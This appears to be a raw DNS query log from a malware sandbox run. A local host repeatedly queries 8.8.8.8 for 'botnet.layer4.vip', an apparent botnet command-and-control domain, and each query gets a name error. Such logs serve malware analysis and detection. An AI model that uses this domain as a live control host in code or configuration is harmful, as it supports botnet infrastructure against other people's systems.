                                  Apr 9, 2023 03:30:51.668152094 CEST8.8.8.8192.168.2.230xc5e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.692886114 CEST8.8.8.8192.168.2.230xc5e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.717159986 CEST8.8.8.8192.168.2.230xc5e9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.733222008 CEST8.8.8.8192.168.2.230x663aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.749283075 CEST8.8.8.8192.168.2.230x663aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.764894009 CEST8.8.8.8192.168.2.230x663aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.780853987 CEST8.8.8.8192.168.2.230x663aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.805351019 CEST8.8.8.8192.168.2.230x663aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.821408033 CEST8.8.8.8192.168.2.230x2297Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.846116066 CEST8.8.8.8192.168.2.230x2297Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.870404005 CEST8.8.8.8192.168.2.230x2297Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.886187077 CEST8.8.8.8192.168.2.230x2297Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.902143002 CEST8.8.8.8192.168.2.230x2297Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.926882982 CEST8.8.8.8192.168.2.230xae4dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.942739964 CEST8.8.8.8192.168.2.230xae4dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.966927052 CEST8.8.8.8192.168.2.230xae4dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.991105080 CEST8.8.8.8192.168.2.230xae4dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.015829086 CEST8.8.8.8192.168.2.230xae4dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.032399893 CEST8.8.8.8192.168.2.230x5a53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.056904078 CEST8.8.8.8192.168.2.230x5a53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.080976009 CEST8.8.8.8192.168.2.230x5a53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.105537891 CEST8.8.8.8192.168.2.230x5a53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.121241093 CEST8.8.8.8192.168.2.230x5a53Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.145802021 CEST8.8.8.8192.168.2.230xd350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.161796093 CEST8.8.8.8192.168.2.230xd350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.177565098 CEST8.8.8.8192.168.2.230xd350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.201519012 CEST8.8.8.8192.168.2.230xd350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.216996908 CEST8.8.8.8192.168.2.230xd350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.241038084 CEST8.8.8.8192.168.2.230x9aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.256513119 CEST8.8.8.8192.168.2.230x9aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.280915976 CEST8.8.8.8192.168.2.230x9aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.305108070 CEST8.8.8.8192.168.2.230x9aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.329209089 CEST8.8.8.8192.168.2.230x9aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.344759941 CEST8.8.8.8192.168.2.230xd5d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.360481024 CEST8.8.8.8192.168.2.230xd5d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.375938892 CEST8.8.8.8192.168.2.230xd5d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.400289059 CEST8.8.8.8192.168.2.230xd5d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.416116953 CEST8.8.8.8192.168.2.230xd5d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.440280914 CEST8.8.8.8192.168.2.230xd12bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.456075907 CEST8.8.8.8192.168.2.230xd12bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.480389118 CEST8.8.8.8192.168.2.230xd12bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.504837036 CEST8.8.8.8192.168.2.230xd12bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.520694017 CEST8.8.8.8192.168.2.230xd12bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.536273956 CEST8.8.8.8192.168.2.230xdf17Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.552123070 CEST8.8.8.8192.168.2.230xdf17Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.576231956 CEST8.8.8.8192.168.2.230xdf17Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.600373983 CEST8.8.8.8192.168.2.230xdf17Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.616194963 CEST8.8.8.8192.168.2.230xdf17Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.640402079 CEST8.8.8.8192.168.2.230x5a27Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.656270027 CEST8.8.8.8192.168.2.230x5a27Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.680356026 CEST8.8.8.8192.168.2.230x5a27Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.696427107 CEST8.8.8.8192.168.2.230x5a27Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.728085041 CEST8.8.8.8192.168.2.230x5a27Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.743943930 CEST8.8.8.8192.168.2.230x4107Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.768064976 CEST8.8.8.8192.168.2.230x4107Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.783543110 CEST8.8.8.8192.168.2.230x4107Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.799030066 CEST8.8.8.8192.168.2.230x4107Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.823168039 CEST8.8.8.8192.168.2.230x4107Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.847459078 CEST8.8.8.8192.168.2.230xd609Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.871505022 CEST8.8.8.8192.168.2.230xd609Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.887320042 CEST8.8.8.8192.168.2.230xd609Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.903764963 CEST8.8.8.8192.168.2.230xd609Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.919212103 CEST8.8.8.8192.168.2.230xd609Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.944355011 CEST8.8.8.8192.168.2.230x7c10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.960270882 CEST8.8.8.8192.168.2.230x7c10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.976099014 CEST8.8.8.8192.168.2.230x7c10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.000463963 CEST8.8.8.8192.168.2.230x7c10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.024765015 CEST8.8.8.8192.168.2.230x7c10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.042010069 CEST8.8.8.8192.168.2.230x4b95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.066339970 CEST8.8.8.8192.168.2.230x4b95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.091495991 CEST8.8.8.8192.168.2.230x4b95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.107924938 CEST8.8.8.8192.168.2.230x4b95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.124851942 CEST8.8.8.8192.168.2.230x4b95Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.141784906 CEST8.8.8.8192.168.2.230xad8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.167220116 CEST8.8.8.8192.168.2.230xad8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.182867050 CEST8.8.8.8192.168.2.230xad8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.198733091 CEST8.8.8.8192.168.2.230xad8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.214585066 CEST8.8.8.8192.168.2.230xad8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.239089966 CEST8.8.8.8192.168.2.230xc366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.263144016 CEST8.8.8.8192.168.2.230xc366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.287260056 CEST8.8.8.8192.168.2.230xc366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.311691046 CEST8.8.8.8192.168.2.230xc366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.327466011 CEST8.8.8.8192.168.2.230xc366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.343167067 CEST8.8.8.8192.168.2.230x1062Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.358871937 CEST8.8.8.8192.168.2.230x1062Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.383090019 CEST8.8.8.8192.168.2.230x1062Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.399105072 CEST8.8.8.8192.168.2.230x1062Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.423754930 CEST8.8.8.8192.168.2.230x1062Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.448275089 CEST8.8.8.8192.168.2.230x93f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.463924885 CEST8.8.8.8192.168.2.230x93f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.479624033 CEST8.8.8.8192.168.2.230x93f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.504107952 CEST8.8.8.8192.168.2.230x93f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.528681040 CEST8.8.8.8192.168.2.230x93f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.553188086 CEST8.8.8.8192.168.2.230x585Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.577825069 CEST8.8.8.8192.168.2.230x585Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.602483034 CEST8.8.8.8192.168.2.230x585Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.626667023 CEST8.8.8.8192.168.2.230x585Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.650819063 CEST8.8.8.8192.168.2.230x585Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.666661024 CEST8.8.8.8192.168.2.230x2db9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.690818071 CEST8.8.8.8192.168.2.230x2db9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.715414047 CEST8.8.8.8192.168.2.230x2db9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.731096983 CEST8.8.8.8192.168.2.230x2db9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.747077942 CEST8.8.8.8192.168.2.230x2db9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.763140917 CEST8.8.8.8192.168.2.230x592Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.778814077 CEST8.8.8.8192.168.2.230x592Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.802944899 CEST8.8.8.8192.168.2.230x592Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.827140093 CEST8.8.8.8192.168.2.230x592Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.843065023 CEST8.8.8.8192.168.2.230x592Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.859185934 CEST8.8.8.8192.168.2.230xeeacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.874917984 CEST8.8.8.8192.168.2.230xeeacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.899471045 CEST8.8.8.8192.168.2.230xeeacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.923648119 CEST8.8.8.8192.168.2.230xeeacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.948220015 CEST8.8.8.8192.168.2.230xeeacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.972866058 CEST8.8.8.8192.168.2.230xb5c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.997375965 CEST8.8.8.8192.168.2.230xb5c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.013063908 CEST8.8.8.8192.168.2.230xb5c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.028711081 CEST8.8.8.8192.168.2.230xb5c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.044806957 CEST8.8.8.8192.168.2.230xb5c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.060945034 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.077007055 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.102140903 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.126562119 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.151185036 CEST8.8.8.8192.168.2.230xa50fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.175921917 CEST8.8.8.8192.168.2.230x6f3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.192255974 CEST8.8.8.8192.168.2.230x6f3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.217502117 CEST8.8.8.8192.168.2.230x6f3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.234024048 CEST8.8.8.8192.168.2.230x6f3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.258477926 CEST8.8.8.8192.168.2.230x6f3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.282982111 CEST8.8.8.8192.168.2.230x635bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.298552036 CEST8.8.8.8192.168.2.230x635bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.323120117 CEST8.8.8.8192.168.2.230x635bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.348623991 CEST8.8.8.8192.168.2.230x635bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.372993946 CEST8.8.8.8192.168.2.230x635bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.389133930 CEST8.8.8.8192.168.2.230x45f6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.413652897 CEST8.8.8.8192.168.2.230x45f6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.438029051 CEST8.8.8.8192.168.2.230x45f6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.462860107 CEST8.8.8.8192.168.2.230x45f6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.478872061 CEST8.8.8.8192.168.2.230x45f6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.503226042 CEST8.8.8.8192.168.2.230x1effName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.528453112 CEST8.8.8.8192.168.2.230x1effName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.544836044 CEST8.8.8.8192.168.2.230x1effName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.561053038 CEST8.8.8.8192.168.2.230x1effName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.586222887 CEST8.8.8.8192.168.2.230x1effName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.602596998 CEST8.8.8.8192.168.2.230x27eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.618879080 CEST8.8.8.8192.168.2.230x27eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.634879112 CEST8.8.8.8192.168.2.230x27eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.650597095 CEST8.8.8.8192.168.2.230x27eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.675935030 CEST8.8.8.8192.168.2.230x27eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.693254948 CEST8.8.8.8192.168.2.230xe2acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.717724085 CEST8.8.8.8192.168.2.230xe2acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.742921114 CEST8.8.8.8192.168.2.230xe2acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.768177032 CEST8.8.8.8192.168.2.230xe2acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.792325020 CEST8.8.8.8192.168.2.230xe2acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.808407068 CEST8.8.8.8192.168.2.230x7753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.833779097 CEST8.8.8.8192.168.2.230x7753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.850197077 CEST8.8.8.8192.168.2.230x7753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.866873026 CEST8.8.8.8192.168.2.230x7753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.892704010 CEST8.8.8.8192.168.2.230x7753Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.917442083 CEST8.8.8.8192.168.2.230x6e1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.933048010 CEST8.8.8.8192.168.2.230x6e1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.958859921 CEST8.8.8.8192.168.2.230x6e1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.983587980 CEST8.8.8.8192.168.2.230x6e1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.999382019 CEST8.8.8.8192.168.2.230x6e1eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.023987055 CEST8.8.8.8192.168.2.230xd999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.039865971 CEST8.8.8.8192.168.2.230xd999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.055471897 CEST8.8.8.8192.168.2.230xd999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.071497917 CEST8.8.8.8192.168.2.230xd999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.086958885 CEST8.8.8.8192.168.2.230xd999Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.111027002 CEST8.8.8.8192.168.2.230xf624Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.135354996 CEST8.8.8.8192.168.2.230xf624Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.159792900 CEST8.8.8.8192.168.2.230xf624Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.184114933 CEST8.8.8.8192.168.2.230xf624Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.208638906 CEST8.8.8.8192.168.2.230xf624Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.224186897 CEST8.8.8.8192.168.2.230xf775Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.248364925 CEST8.8.8.8192.168.2.230xf775Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.263886929 CEST8.8.8.8192.168.2.230xf775Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.279674053 CEST8.8.8.8192.168.2.230xf775Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.304049969 CEST8.8.8.8192.168.2.230xf775Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.319930077 CEST8.8.8.8192.168.2.230x948Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.343933105 CEST8.8.8.8192.168.2.230x948Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.359743118 CEST8.8.8.8192.168.2.230x948Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.375571966 CEST8.8.8.8192.168.2.230x948Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.399627924 CEST8.8.8.8192.168.2.230x948Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.415549040 CEST8.8.8.8192.168.2.230x2ec2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.431032896 CEST8.8.8.8192.168.2.230x2ec2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.446976900 CEST8.8.8.8192.168.2.230x2ec2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
